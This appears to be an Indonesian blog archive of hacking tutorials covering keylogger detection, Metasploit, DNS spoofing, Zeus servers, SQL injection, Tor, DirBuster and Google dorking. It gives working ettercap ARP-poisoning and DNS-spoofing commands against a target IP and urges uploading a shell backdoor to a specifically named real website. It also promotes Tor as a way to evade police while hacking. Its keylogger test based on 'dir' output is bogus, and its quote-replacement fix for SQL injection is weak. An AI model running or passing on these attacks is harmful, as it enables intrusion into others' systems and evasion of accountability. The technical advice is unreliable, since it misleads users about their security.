Rabu, 20 Agustus 2014
TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt )
di poskan oleh Diaz Rinaldi 14.16
TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Selasa, September 03, 2013 All About Computer, Pengetahuan 1 comment TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Saya akan mencoba mewakili beberapa pertanyaan yang mungkin dialami sebagian pengguna komputer/internet terutama mereka yang paham bahayanya komputer jika sudah mulai dimata-matai seseorang yang tidak bertanggung jawab. Bgaimana Mengetahui Apakah Pada Sebuah Komputer Terpasang Keylogger ? Cara seorang Hacker membobol Password Kita? ? Bagaimana dapat mengetahui suatu komputer telah dipasangi keylogger atau dimata-matai seseorang yang ingin tahu semua isi komputer dan aktifitas kita saat terkoneksi ke internet. Lalu apa bahayanya Kelogger yang terpasang di komputer. Mungkin tidak semua pengguna komputer antipati terhadap serananda virus atau keylogger (alat perekam) pada sebuah komputer miliknya (hal itu bisa terjadi karena umumnya mereka tidak tahu ) lalu apa bahayanya? Bagi anda yang tidak terlalu banyak bertransaksi melalui komputer secara online mungkin tidak terlalu berbahaya, terlebih jika seseorang browsing hanya sekedar baca-baca, download, chatting, facebookan dll, sehinga jika sewaktu-waktu akun facebook kena hack (dirusak) tinggal bikin lagi, mudah kan ? Tapi bagi mereka yang menggunakan komputer, internet, facebook sebagai media berbisnis tentu saja adanya keylogger di komputer sangat berbahaya, karena sekecil apapun yang kita lakukan akan diketahui oleh pemasang keylogger di komputer kita, salah satu contoh email dan pasword kita akan tersadap secara otomatis, mungkin kalau hanya email yang tidak begitu penting tidak jadi masalah bagaimana jika pasword rekening online kita seperti paypai, liberty, alertpay, klik BCA serta akun bisnis online lainnya pindah tananda, secara materi sudah pasti kita rugi. 1. Buka command prompt. Caranya klik start >> pilih all program >> ke accessories >> pilih command prompt 2. Kemudian ketik dir lalu tekan enter (lihat gambar) 3. Setelah selesai akan muncul keluar di command prompt (terlebih duluanda catat angkanya di kertas agar tidak lupa). (Lihat gambar 2) 4. Sekarang Buka program notepad (caranya klik start > all program > assesories > pilih notepad lalu anda mengeketik sembarangan di notepad (agak banyak tapi jangan di save ) Kemudian Ulangi langkah 1 s/d 3 tapi di CMD yang baru jgn di CMD bekas tadi soal'a klw yg tadi angka'a pasti beda, (ketik dir ) jika anda melihat angka itu berubah berarti dikomputer anda ada keylogger, kalau anda merasa tidak menginstal program tertentu atau ada orang lain menginstal keylogger dikomputer anda, bisa jadi berupa program berbahaya jenis lain telah menyerang komputer anda secara online seperti virus, malware, spyware dll dan fungsinya tidak jauh beda dengan keylogger Terima kasih telah membaca postingan saya yg berjudul : TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Rating: 5.0 Description: TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt )
Selasa, 05 Agustus 2014
Wireshark
Dan situs (website) lain nya juga masih banyak yang ada di internet dari segi namapun wireshark menunjukan kemampuan nya, seperti yang anda lihat di dalam film-film tentang hiu yang cerdas dan pintar, dan melahab semua turis yang berombang ambing di lautan, sepertihal nya seekor hiu yang hidup di sebuah jaringan, dan melahab semua data yang berteparan di jaringan tersebut.
Metasploit
yang
sangat serba guna yang tidak bisa di tinggalkan dalam distro-distro
linux yang khusus untuk melakukan penetrasi tester untuk membuat atau
melihat system mereka sudah layak di public apa belom siap.
Dengan
menguasai metasploit dan jaringan komputer saja anda sudah bisa
merasakan bagai mana sebenar nya dunia cyber dan IT security , yang bisa
anda lakukan dengan menggunakan msf ini adalah :
- anda dapat membuat shell sendiri dengan generate
-
anda dapat melihat lalulintas data yang ada
-
scan web vullnerability scanner dengan websploit
-
menembus firewall
-
memalsukan data
-
membuat backdoor dan trojan
-
DdoS sebuah website atau jaringan
-
sniffing
-
DLL yang sangat banyak untuk di sebutkan
Hampir semua distro linux intuk melakukan penetrasi tester memiliki msf ini , ini adalah distro yang memiliki msf :
-
kali-linux
-
backtrack
-
black box
Msf
dibuat oleh perusahan yang berbidang di IT security yang mengumpulkan
database-database vullnerability yang ada, dengan system update anda
akan selalu mendapatkan yang terbaru dari msf ini.
DNS Spoofing
DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.
Langkah-langkah melakukan DNS spoofing adalah :
download applikasi nya bisa ettercap bisa juga dengan cain&able yang anda bisa dapatkan di internet
ettercap :
- OS linux kali linux/windows.
- Disi di jelaskan menggunakan kali linux.
- Buka terminal dan kettik ettercap –help akan menampilkan perintah-perintah panduan ettercap.
- Rubah setting DNS yang ada di ettercap dengan cara ketik “ nano
/etc/ettercap/etter.dns” hapus semua nya dan isikan settingan berikut :
www.yahoo.com A [ip-address target]
www.facebook.com A [ip-address target]
*.com A [ip-address target]
NB : itu akan merubah koneksi facebook.com dan yahoo.com mengarah ke ip target dan yang terjadi ip terget akan down dan bisa bisa komputer nya over dan reboot sendiri. Ada beberapa fariasi serangan yang di lakukan dengan DNS spofing. Seperti penanaman virus dan phising yang belom di bahas saat ini. Lanjut langkah berikutnya
5. Masih di jendela terminal dan ketikan “ ettercap -T -q -i [wlan0/interface-anda] -P dns_spoof -M ARP-REMOTE /ip-target/ /getaway/ enter , sebelum melakukan ini anda di haruskan untuk mengaktifkan ip forwarding dengan cara : “ echo 1 > /proc/sys/net/ipv4/ip_forward “ dan enter
selamat membaca semoga bermanfaat.
Melacak server Zeus!!!
Kalian buka browser kalian dan akseslah zeustracker di situ https://zeustracker.abuse.ch/ dan lihat berapa banyak zeus tersebar seperti pada gambar berikut
Di lihat di atas terdapat
beberapa server zeus di dalam indonesia ! Apakah ini ulah hacker-hacker
indonesia sendiri untuk mencuri data dan file di dalam server
menggunakan zeus untuk mengirimkan file-file curian atau yang lebih
parah lagi jika hacker dari negara lain yang menjadikan target indonesia
sebagai korban zeus yang selanjutnya
Coba kalian akses salah
satu yang tertera di dalam map dengn simbol merah dan lihat informasi
yang keluar seperti pada contoh yang di pilih negara indonesia sendiri
Klick di bagian IP
address yang tertera dalam informasi tadi untuk melihat lebih jelas
informasi dari zeus server yang berada di dalam indonesia, setelah
kalian mengakses IP address yang tertera di dalam map maka akan keluar
informasi seperti berikut
Lebih jelas lagi coba
kalian klick website yang sebagai domain untuk server zeus di dalam
informasi yang ada, maka akan keluar inforasi seperti ini
coba akses lebih lanjut lagi dengan mengunjungi link yang ada seperti http://syakhroni.blog.unissula.ac.id/admin/file.php
akan mengizinkan kalian untuk mengupload file yang ada di dalam pc
kalian, kalian bisa saja merebut dengan upload file shell backdoor yang
ada dan kalian bisa mengakses database server website tersebut
Coba kalian check dengan
menggunakan nmap service yang berada di dalam server tersebut banyak
sekali dan menunjukan bahwa zeus menggunakan database mysql sebagai
database server seperti pada contoh berikut
semoga bermanfaat dan menambah wawasan pembaca :)
Mengenal SQL Injection
Sebenarnya SQL injection sendiri bukanlah hal baru, dari dulu teknik ini sudah dikenal dalam dunia hacking sebagai salah satu teknik web hacking, namun baru muncul lagi sekarang karena sifatnya yang dapat merusak database dari suatu situs. Teknik yang digunakan dalam SQL Injection adalah dengan jalan menginput perintah- perintah standar dalam SQL (DDL, DML, DCL) seperti CREATE, INSERT, UPDATE, DROP, ALTER, UNION, SELECT dan perintah-perintah lainnya yang tak asing lagi bagi anda yang sudah mengenal SQL secara mendalam maupun yang baru saja belajar. Dari berbagai jenis SQL dari MySQL, PostgreSQL, Nuke SQL, dan MS-SQL, yang paling rentan terhadap SQL Injection adalah MS-SQL.
SQL Injection adalah suatu teknik injeksi kode yan
g mengeksploitasi kerentanan keamanan yang terjadi pada lapisan database. Kelemahan ini muncul ketika pengguna lolos menembus keamanan dari database tersebut. Contohnya, pembobolan lewat input box dan memasukkannya lewat alamat URL. Selain itu Teknik hacking SQL injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu 2009 putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan portport yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tools ke situs tersebut yang konon systemnya seharga 152 milyar itu dengan keamanannya yang berlapis lapis.
Pengertian SQL Injection
- SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
- SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
- Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus — yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
- Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
- Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
- Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
- Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
1. Lindungi Query SQL
Untuk melindungi query SQL, kita harus menerapkan tehnik
sanitasi/mengosongkan seluruh input yang diterima dari request object
ASP seperti: Request, Request.QueryString, Request.Form,
Request.Cookies dan Request.ServerVariabbles. Teknik sanitasi ini
sangat tergantung pada Relational Database Management System. RDBMS
merupakan sistem yang multiuser. Oleh karena itu, RDBMS menyertakan
fitur sekuriti untuk mengontrol akses ke/dan penggunaan database. Tujuan
arsitektur sekuriti RDBMS adalah untuk melindungi dan memverifikasi
semua bagian informasi yang tersimpan dalam database. Informasi bisnis
perlu diverifikasi untuk memastikan bahwa tidak ada data yang berubah.
Contoh penanganan MS SQL Server seperti dibawah ini.
Dalam sebuah halaman login, script semestinya terdiri dari dua variabel (txtUserName, txtPassword) dari jenis string yang dilewati. Saat sebuah tanda petik tunggal (‘) dimasukkan dalam sebuah parameter, hal ini mengijinkan user untuk memanipulasi perintah yang dieksekusi. Untuk menghadapi ancaman SQL Injection, hindari penggunaan tanda petik tunggal (‘) dengan menggunakan fungsi REPLACE, seperti dibawah ini:
Contoh penanganan MS SQL Server seperti dibawah ini.
Dalam sebuah halaman login, script semestinya terdiri dari dua variabel (txtUserName, txtPassword) dari jenis string yang dilewati. Saat sebuah tanda petik tunggal (‘) dimasukkan dalam sebuah parameter, hal ini mengijinkan user untuk memanipulasi perintah yang dieksekusi. Untuk menghadapi ancaman SQL Injection, hindari penggunaan tanda petik tunggal (‘) dengan menggunakan fungsi REPLACE, seperti dibawah ini:
p_strUsername = Replace(Request.Form(“txtUsername”), “‘”, “””)
p_strPassword = Replace(Request.Form(“txtPassword”), “‘”, “””)
p_strPassword = Replace(Request.Form(“txtPassword”), “‘”, “””)
Contoh yang kedua, script diharapkan adalah sebuah variabel (ID)
jenis long integer. Perintah SQL yang tidak diotorisasi dapat
mengeksekusi dengan menambahkan perintah SQL ke dalam parameter ID.
Untuk mengatasi hal ini gunakan input untuk Long Integer dengan fungsi
CLng sbb:
p_lngID = CLng(Request(“ID”))
Jika user mencoba melewati suatu string, fungsi CLng akan menampilkan pesan error.
Install tor proxy
berdasarkan alamat IP adress hacker tersebut atau dengan teman dekat
nya , jika kalian melakukan aksi hacking di anjurkan menggunakan proxy
untuk menjauh dari aksi-aksi orang paling menyebalkan setelah Pebejat
(baca aja pejabat) yaitu polkisi (baca aja polisi)
sekarnag mari di bahas tentang bagaimana cara kerja proxy ??? Bagaimana Cara Kerja Proxy?
Proxy bekerja dengan mendengarkan request
dari client internal dan mengirim request tersebut ke jaringan
eksternal seolah-olah proxy server itu sendiri yang menjadi client. Pada
waktu proxy server menerima respon dan server publik, ia memberikan
respon tersebut ke client yang asli seolah-olah ia public server.
Proxy dan Keamanan
Internet yang sekarang juga mempunyai
cirinya sendiri, dan proxy server menunjukkan efek samping yang sungguh
tak terduga: mereka dapat menyembunyikan semua user di belakang satu
mesin, mereka dapat memfilter URL, dan mereka dapat membuang content
yang mencurigakan atau ilegal. Jadi meskipun mula-mula dibuat sebagai
cache nonsekuriti, tujuan utama proxy server sekarang menjadi
firewalling.
Proxy server memperbarui request layanan
pada jaringan eksternal atas nama client mereka pada jaringan private.
Ini secara otomatis menyembunyikan identitas dan jumlah client pada
jaringan internal dari jaringan eksternal. Karena posisi mereka di
antara client internal dan server publik, proxy juga dapat menyimpan
content yang sering diakses dari jaringan publik untuk mengurangi akses
ke jaringan publik tersebut. Kebanyakan implementasi nyata proxy
sekuriti meliputi pemilteran paket dan Network Address Translation untuk
membangun firewall yang utuh. Teknologi tersebut dapat digabungkan
dengan proxy untuk menghilangkan serangan yang terhadapnya proxy rentan.
Menyembunyikan Client
Fitur keamanan utama proxy server adalah
menyembunyikan client. Seperti Network Address Translation, proxy server
dapat membuat seluruh jaringan internal muncul sebagai satu mesin dari
Internet karena hanya satu mesin yang melewatkan request ke Internet.
Seperti Network Address Translatation,
proxy server mencegah host eksternal untuk mengakses layanan pada mesin
internal. Pada proxy server, tidak ada routing ke client karena domain
alamat jaringan internal dan eksternal bisa saja tidak kompatibel dan
karena transport layer routing tidak ada di antara kedua jaringan.
Proxy melakukan fitur ini dengan
memperbarui request, bukan mengganti dan menghitung ulang header alamat.
Sebagai contoh, pada waktu client membuat request melalui proxy server,
proxy server menerima request tersebut seolah-olah web server tujuan
pada jaringan internal. Ia kemudian memperbarui request ke jaringan
eksternal seolah web browser biasa. Pada waktu proxy menerima respon
dari web server yang sebenarnya, ia memberikan respon tersebut kepada
client internalnya. Hanya HTTP yang dilewatkan melalui proxy, bukan TCP
atau IP. TCP/IP (dan protokol low-level lainnya) diperbarui oleh proxy;
mereka tidak akan dilewatkan melalui proxy.
Aspek lain dari penyembunyian client
adalah penyebaran koneksi; proxy server dapat digunakan untuk membagi
satu koneksi Internet dan alamat IP ke seluruh jaringan. Oleh karena
itu, proxy server seperti WinGate sangat populer di lingkungan rumahan
dan kantor kecil di mana hanya ada satu koneksi dial-up atau dedicated
yang tersedia.
Pemblokiran URL
Pemblokiran URL memungkinkan
administrator untuk menolak situs tertentu berdasarkan URL mereka.
Secara teori, ini akan menjauhkan pegawai Anda dari situs web yang tidak
boleh mereka akses. Fungsi ini mudah diimplementasikan. Proxy mengecek
setiap request dengan daftar halaman yang ditolak sebelum ia memperbarui
request tersebut. Jika URL diblokir, proxy tidak akan meminta atau
memberikan halaman tersebut.
Namun, pemblokiran URL mudah diatasi,
karena situs web bisa ditulis dengan menggunakan alamat IP atau bahkan
keseluruhan nomor alamat. User dapat mengetik apa saja dalam web browser
mereka untuk mengakses halaman yang sama, namun URL blocker Anda
(mungkin) hanya akan mengecek alamat lengkap URL.
Masalah lain dengan pemblokiran URL
adalah memperbarui situs yang diblokir. Situs seperti hacking,
pornografi, dan situs game mempunyai masa hidup yang singkat, mereka
dapat muncul dan hilang dengan cepat. Sulit rasanya untuk memblokir
mereka dengan database pemblokiran URL Anda. Kebanyakan orang akan
menggunakan search engine atau berita Usenet untuk mengetahui keberadaan
situs.
Pemilteran Content
Karena proxy memperbarui semua muatan
protokol dan protokol spesifik, proxy dapat digunakan untuk mencari
muatan content yang mencurigakan. Ini berarti Anda dapat mengonfigurasi
layanan proxy HTTP untuk mempreteli kontrol ActiveX, applet Java, atau
bahkan gambar berukuran besar jika Anda rasa mereka bisa menyebabkan
masalah keamanan. Anda juga bisa menggunakan proxy SMTP utuk mempreteli
attachment berupa file executable dan file arsip zip jika Anda rasa
mereka menyebabkan masalah.
Pemfilteran content juga dapat digunakan
untuk mengecek halaman web akan adanya kata atau kalimat tertentu,
seperti merk dagang kompetitor Anda atau sejumlah berita hangat. Anda
harus memfilter control ActiveX, applet Java, dan file executable dalam
e-mail karena mereka dapat digunakan untuk menginstalasi Trojan horse.
Jika ada user yang perlu mentransfer file
executable, minta mereka untuk mentransfernya dalam file zip atau
gunakan BinHex atau encoder yang lain untuk mentransfernya dalam format
teks. File akan perlu di-decode, sehingga mencegah pentransferan virus
atau Trojan horse.
Pengecekan Konsistensi
Pengecekan konsistensi merupakan
pengecekan content protokol untuk memastikan itu dapat dimengerti oleh
protokol. Pengecekan konsistensi memastikan bahwa jenis content tertentu
tidak dapat digunakan untuk mengeksploitasi kelemahan sistem keamanan
dalam jaringan internal Anda
Sebagai contoh, daemon SMTP Sendmail Unix
dulunya terkenal peka terhadap masalah buffer overflow. Ini terjadi
pada waktu e-mail dikirim dan membutuhkan waktu lebih lama dari yang
ditentukan. Sendmail akan mengalokasikan bagian memory sebesar yang
diminta oleh e-mail tersebut, tetapi kemudian memeriksa e-mail sampai
akhirnya tiba di bagian akhir. Jika di antara bagian yang diminta dan
bagian akhir berisi kode executable, hacker bisa mendapatkan akses root
ke e-mail server Anda.
Anda tentu pernah mendengar tentang
banyaknya jumlah eksploitasi buffer overflow yang dilakukan oleh hacker
untuk melawan IIS. Dengan menggunakan URL yang lebih panjang dari yang
bisa ditangani IIS dan eksploitasi terhadap DLL pendukung, hacker dapat
membuat serangan otomatis terhadap IIS yang bekerja sebagai worm pada
Internet dan menyebabkan kerusakan secara luas. Microsoft telah
meluncurkan perbaikan keamanan untuk mengatasi masalah ini.
Pengecekan konsistensi dengan proxy dapat
memastikan bahwa masalah semacam ini bisa dihilangkan pada proxy
sehingga mereka tidak akan mempengaruhi mesin internal. Sayangnya,
masalah yang harus dicek biasanya tidak diketahui sampai hacker
mengeksploitasi mereka, jadi kebanyakan pengecekan konsistensi hanya
dilakukan setelah ditemukan adanya eksploitasi.
Pemblokiran Routing
Paket Transport layer perlu diarahkan
karena request semuanya diperbarui. Hal ini menghilangkan eksploitasi
Transport layer seperti routing, fragmentasi, dan beragam serangan
denialof-service. Dengan menghilangkan routing, Anda juga dapat
memastikan bahwa semua protokol yang belum Anda tentukan tidak akan
dilewatkan ke jaringan publik. Pemblokiran routing mungkin merupakan
keuntungan proxy server yang paling penting. Karena paket TCP/IP
sebenarnya lewat antara jaringan internal dan eksternal, banyak serangan
denial-of-service dan eksploitasi yang dapat dicegah.
Sayangnya, pemblokiran routing tidak
begitu sering digunakan karena banyaknya protokol yang ada. Sedapat
mungkin jangan perbolehkan paket low-level melewati proxy server kita.
Kebanyakan proxy server memperbolehkan Anda untuk membuat proxy TCP
generik untuk semua port yang enggunakan proxy SOCKS generik atau
utiiliti redir Unix. Proxy generik ini, meskipun mereka tidak dapat
melakukan pemfilteran content, tetapi memungkinkan Anda untuk mencegah
paket TCP/IP berlalu-lalang antarjaringan Anda.
Logging dan Alerting
Manfaat keamanan terakhir dari proxy
adalah fasilitas logging dan alerting yang mereka sediakan. Proxy
memastikan bahwa semua content mengalir melalui satu poin, yang bisa
menjadi tempat pemeriksaan data jaringan.
Kebanyakan proxy server akan mencatat penggunaan proxy oleh user dan
dapat dikonfigurasi untuk mencatat situs yang mereka kunjungi. Ini akan
memungkinkan Anda untuk mengatur ulang cara browsing user jika Anda
curiga akan adanya aktivitas yang ilegal atau tidak semestinya.
Fasilitas alert disediakan oleh beberapa
proxy untuk memperingatkan Anda atas serangan yang terjadi, meskipun
proxy umumnya bukan sasaran penyerangan. Namun, fasilitas ini bisa
digunakan untuk meningkatkan kewaspadaan Anda pada interface eksternal,
yang sering kali dicoba untuk dieksplotiasi oleh hacker.
Proxy dan Kinerja
Selain aspek keamanan, proxy server juga
dapat memberikan peningkatan kinerja yang penting. Pertama, proxy dapat
menyimpan data yang sering direquest untuk meningkatkan kinerja dengan
menghilangkan akses berlebih ke jaringan eksternal (yang kecepatannya
lebih lambat). Kedua, proxy dapat menyeimbangkan beban service ke
sejumlah server internal.
Caching
Seperti yang telah disebutkan di bagian
awal artikel ini, proxy mula-mula dikembangkan sebagi peningkat kinerja,
bukan sebagai perangkat pengaman. Pada awal Internet, hanya ada ribuan
situs web. Mereka kebanyakan bersifat ilmiah dan tidak sering berubah.
Karena koneksi ke Internet lambat, proxy dapat digunakan untuk menyimpan
sebagian besar Internet secara lokal, sehingga pengguna internal cukup
browsing ke proxy lokal. Content tidak berubah dengan sangat cepat, jadi
ini masih masuk akal.
Sekarang caching hanya masuk akal jika
ada user dalam jumlah besar yang mengakses halaman web yang sama
berulang-ulang. Pola penggunaan seperti ini sekarang sudah jarang, jadi
segi caching proxy server sudah mulai usang.
Dengan e-commerce yang semakin umum,
caching akan kembali menjadi fungsi yang penting karena banyak orang
akan melakukan pekerjaan mereka dengan menghadapi beberapa situs yang
sering diakses. Sebagai contoh, ambil agen perjalanan yang menggunakan
Expedia.com dan Travelocity.com untuk melakukan pekerjaan mereka. Banyak
agen akan mengakses dua situs yang sama berulang-ulang, sehingga
menyimpan elemen situs utama, gambar, dan applet adalah masuk akal.
Reverse Proxy Load Balancing
Proxy server sekarang ini dapat digunakan
untuk melakukan “reverse proxy,” atau menyediakan layanan proxy ke
client eksternal untuk server internal. Fungsi ini digunakan untuk
menyeimbangkan beban klien ke sejumlah web server. Banyak situs web yang
fungsionalitasnya tinggi menggunakan aplikasi kompleks seperti ISAPI,
Active Server Pages, Java servlet, atau CGI. Aplikasi ini dijalankan
pada server, sehingga mereka sangat mengurangi banyaknya client yang
mampu ditangani oleh satu server. Sebagai contoh, Windows 2000 server
yang menjalankan IIS yang bisa menangani sampai 100.000 browser untuk
halaman HTML standar hanya bisa menangani 5000 browser halaman ASP.
Ini berarti bahwa kebanyakan fungsi
e-commerce sebenarnya tidak bisa ditangani oleh satu server, jadi situs
tersebut harus dijalankan secara paralel ke sejumlah mesin. Sebagai
contoh, http://www.microsoft.com/ dijalankan pada 30 server DNS yang
identik. DNS menyediakan skema dasar load-sharing di mana akses ke nama
DNS akan mendapatkan salah satu alamat IP, tetapi ini belum benar-benar
menyeimbangkan beban.
Sudah jelas bagaimana cara proxy bekerja
dan apa saja yang bisa di lakukan mengguanakan proxy , hampir sama
seperti firewall kan ! Oke kali ini penulis akan memberikan sebuah Proxy
ada baik nya dan ada tidak nya juga yaitu TOR-PROXY ,baik nya dengan
menggunakan tor ini kalian akan susah untuk di lacak karna Tor memiliki
banyak bahkan ribuan IP untuk penggunanya , dan sangat banyak sekali di
gunakan oleh para milliter untuk melakukan tugas nya di dalam install
tor proxy ada beberapa hal yang harus di install antaralain adalah :
-
tor software (apps yang di guanakan untuk koneksi keserver Tor-proxy)
-
vidalia (network mapping untuk server tor)
-
NTP server (Network Time Protocol)
-
addons di mozzilla atau iceweasel “auto proxy”
oke untuk menginstall tor kalian tidak
perlu repot karna di repository kali linux sudah di sediakan , anda
tinggal membuka terminal dan meminta tor tersebut dengan menginstall nya
“apt-get install tor” dan tunggu hingga selesai , tidak ada yang perlu
di configurasi lagi jika tidak ada error nya oke , kalau terjadi error
coapas error nya di google belajar mandiri (mandi sendiri hahaha) yaps
setelah selesai kalian boleh menginstall nettwork mapping tor server
yaitu vidalia , fungsi ini untuk melihat lalulintas kalian di tor
pastikan sudah terinstall dengan benar
oke , sekarang tahap nya adalah menginstall NTP server , Ntp server
digunakan untuk menyamakan waktu yang berada di server tor , karna jika
waktu kita menggunakan waktu indonesia maka tor tidak akan terkoneksi
dengan benar , karna koneksi tor juga berasal dari Negara-negara di mana
server tor tersebut di letakan
langglah berikut nya install addons auto-proxy seperti berikut
→ buka webbroser
→ tools
→ add-ons
→ get add-ons
→ cari auto-proxy yang seperti penulis gunakan
ada beberapa yang perlu di setting di
dalam add-ons tersebut , coba perhatikan ujung kanan pada webbroser
kalian (iceweasel / mozilla) terdapat add-ons baru kan
coba klick pada add-ons proxy tersebut
ada beberapa pilihan yaitu auto metic mode , global mode dan disable
proxy itu untuk menyalakan proxy kalian , setelah kalian menginstall tor
kali ini kalian akan menggunakanya mari ikuti jejak buku ini oke
→ jalankan service NTPd dengan perintah ini di consoel “/etc/init.d/ntp restart atau ntpd restart”
→ jalankan tor “/etc/init.d/tor restart”
→ kemudian kalian baru bisa menjalankan vidalia nya ketik di console “vidalia”
→ buka
browser kalian jalankan add-ons kalian dengan mode “auto metic proxy”
maka add-ons akan menjadi merah tanda berjalan nya proxy kalian ada
sedikit yang perlu dirubah di dalam add-ons tersebut yaitu default proxy
dan when not maching di rubah mejadi koneksi ke server TOR semua oke
→ kemududian check IP kalian dengan whatismyip / IP kalan sudah berubah
nah dengan adanya
proy ini kalian menjadi lebih susah di temukan karna IP kalian bukan
asli dan mengguanakan tor yang mana menggunakan ribuan IP untuk koneksi
ke Internet
Mencari directory sensitiv
disini akan di bahas mengenai loss
directory yang akan di dapatkan dengan menggunakan software DIRBUSTER ,
apa itu dirbuster ??? dirbuster adalah software yang dapat mencari url
yang berisi file atau directory yang dapat di baca oleh user (yang
seharusnya tidak boleh di baca oleh user biasa atau yang boleh di baca
oleh user biasa) bukan hanya directory , software ini juga dapat mencari
file-file sensitif seperti upload.php atau download.php , dan bahkan
saya pernah mencoba dan bisa membuka configure.php dan apa hasil nya !
Saya mendapatkan user : root dan passwordnya , memalukan bukan ! Oke
langsung saja jika kalian menggunakan kali linux atau backtrack di situ
sudah ada , ada dua cara untuk menggunakan dirbuster ini , satu
membukanya melalui menu Applications → kali linux → web vulnerabilty →
web crawlers → dirbuster
cara yang kedua buka menu console , dan
ketikan dirbuster dan enter maka akan muncul halaman applikasi
dirbuster seperti berikut ini
menu target url di situ kalian
memasukan taregt yang akan di gali dari directory atau file yang bisa
kalian dapatkan contohnya http://abc.com:80/ , setelah itu pilih kamus
brutforce yang sudah di sediakan oleh dirbuster tersebut di folder
“/usr/share/dirbuster/wordlist/” dan pilih terserah kalian , lebih baik
kalian cari tau terlebih dahulu mengenai werserver yang di gunakan oleh
website target apache atau IIS atau yang lainya
oke kemudian hilangkan di bagian
extensi file php yang ada di “file extensions” karna itu hanya akan
mencari file-file php yang ada
sudah selesai sekarang kalian klick
start dan tunggu hasilnya ini tergantung proxy yang kalian gunakan dan
koneksi kalian , dan seberapa banyak brutforce yang di gunakan oleh
dirbuster sendiri , maka dari itu kalian siapkan satu gelas kopi dan
beberapa batang rokok sampoerna :D hahaha justkid :D monggo di coba
semoga bermanfaat sampai jumpa kembali
Google hacking
Mau tau apa yang di gunakan oleh hacker tersebut
untuk menembus system dan mendapatkan 200 website dengan waktu yang
sangtat singkat ? Hacker tersebut hanya bermodalkan GOOGLE ! What s
hacker tersebut hanya menggunakan google untuk menembus 200 server
tersebut ?! ya benar hacker tersebut menggunakan GOOGLE
Selama ini GOOGLE yang kalian kenal sebagai mesin
pembantu dan mesin pencari solusi dari berbagai masalah teknis maupun
non teknis yang kalian hadapi , tapi di sisi lain google sangatlah
berbahaya karena GOOGLE memiliki dua sudut , kalau istilah nya pedang
bercabang 2 jadi google memiliki dua pemeranan tergantung yang
menggunakanya , jika yang menggunakanya baek maka google bisa menjadi
malaikat yang dapat menyelesaikan masalah dengan singkat atau menemukan
masalah yang kita alami seolah dia adalah malaikat
Akan tetapi jika jatuh di tangan kalian (bercanda
broo …. :P) google bisa melebihi ganas nya buaya yang lapar dan lama
menunggu sapi atau hewan yang berenang , setelah hewan tersebut berenang
mampuslah hewan tersebut , akan tetapi di sini google melebihi dari
buaya tersebut ! karena google bisa memangsa ratusa server sedangkan
buaya hanya satu hewan saja hahaha …
Yang bisa kalian lakukan dengan google banyak kan ,
akan tetapi cuma beberapa hal saja dan hanya sekedar contoh bagaimana
sih google dapat melakuka nya dan caranya pastinya bagaimana ? Oke kita
bahas satu persatu yaa
Ada istilah di google adalah google dork , google
dork ini adalah dork yang di gunakan untuk seorang hacker mendapatkan
system yang mereka inginkan , biasanya hacker lamer dengan hacker elite
memiliki beberapa berbedaan , salah satu nya mereka si lamer mencari
server dengan dork google hanya untuk mendeface dan menaruhkan nama
mereka di dalam server tersebut agar di kenal dan di takuti hahahah ….
jika hacker elite menggunakan google dork untuk mengambil server maka
server yang di cari dengan google dork akan dijadikan zombie untuk
melakukan serangan yang lebih berbahaya lagi contoh google dork banyak
sekali kalian cari di google juga pasti pada bermunculan hahah :D ni
contoh nya :
Mencari sebagian dari URL
di mesin pencari terbesar seluruh jagat raya ini
google dapat menemukan bagian-bagian dari URL sebuah website dengan
mudah dan sangat cepat , mengapa harus bagian dari pada URL kenapa tidak
yang lain ? Karna url adalah alamat yang kadang tidak boleh di kunjungi
oleh user biasa , seperti saat kalian mencari url yang di dalamnya
terdapat file “admin.php/” tidak akan muncul jika kalian menuliskan di
google “admin.php” yang ada yang muncul tutorial-tutorial yang bekaitan
dengan kata-kata admin dan kata-kata PHP
Disini akan di coba mencari bagian dari url sebiah website , perintah yang di gunkan adalalh inurl dan allinurl , printah tadi sangat berbeda jika kalian menggunakan perintah “inurl:/index.php?id=”
tanpa tanda kutip pastinya , kalian akan menemukan
beberapa website yang menggunakan url inurl:/index.php?id= denagn
catatan bisa jadi idnya ada di bagian belakang dan index tidak sama
dengan perintah yang kalian inginkan , dan jika klian menggunakan
perintah “allinurl:.index.php?id=user” yang akan muncul website-website
yang memilki url tersebut , satu contoh lagi ketika kalian ingin mencari
tempat untuk mengupload foto maka perintah yang kalian input di google
sebagai berikut “inurl:/upload.php” maka lihat ribuan website muncul
dengan url upload.php
[Mencari file]
Google banyak sekali di gunakan untuk mencari file
yang kita inginkan , misal kita ingin mendownload file untuk soal soal
test ujian ,yang kita lakukan adalah menuliskan perintah “Download
soal-soal latihan ujian tehnik elektro” dan enter , google akan
menampilkan website-website atau link-link yang di dalamnya terdapat
